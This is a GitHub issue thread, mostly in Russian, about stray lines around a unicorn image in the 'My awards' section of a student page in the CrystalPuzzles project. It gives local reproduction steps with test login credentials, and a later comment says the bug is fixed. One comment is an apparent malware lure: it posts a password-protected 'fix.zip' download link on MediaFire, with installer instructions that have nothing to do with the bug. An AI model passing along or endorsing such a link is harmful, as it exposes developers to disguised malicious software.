### ISSUE TITLE
Лишние линии на главной странице ученика

### ISSUE THREAD

**Issue by 8highflyer8** [Neto-Solutions/CrystalPuzzles#211]
**Описание**

Лишние линии на главной странице ученика в разделе Мои награды

**Критичность** 

Незначительная

**Локация дефекта**

http://localhost:8080/static/media/unicorn.79d34570b03372e131e5.svg

**Шаги воспроизведения**

1. Клонировать на локальный репозиторий проект 
2. Перейти в ветку test 
3. В командной строке запустить контейнеры docker-compose up -d
4. Открыть http://localhost:8080/
5. Зайти под учеником 
"email": "student@crystal.com"
"password": "studentpass"

**Ожидаемый результат:**  Нет линий стыка картинки единорога и блока Мои награды

**Фактический результат:** Лишние линии

**Скриншот**
![image](https://github.com/user-attachments/assets/db30529c-fe68-4e97-8adf-b29815aad8a1)

**Окружение**
Операционная система: Windows 10 Pro 22H2 сборка 19045.2130
Браузер: Chrome Версия 127.0.6533.122 (Официальная сборка), (64 бит)
ПО: IntelliJ IDEA 2022.3.2 (Community Edition)
	Docker Desktop version 4.21.1 (114176)

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by OlgaIts** [comment]
Ошибка исправлена
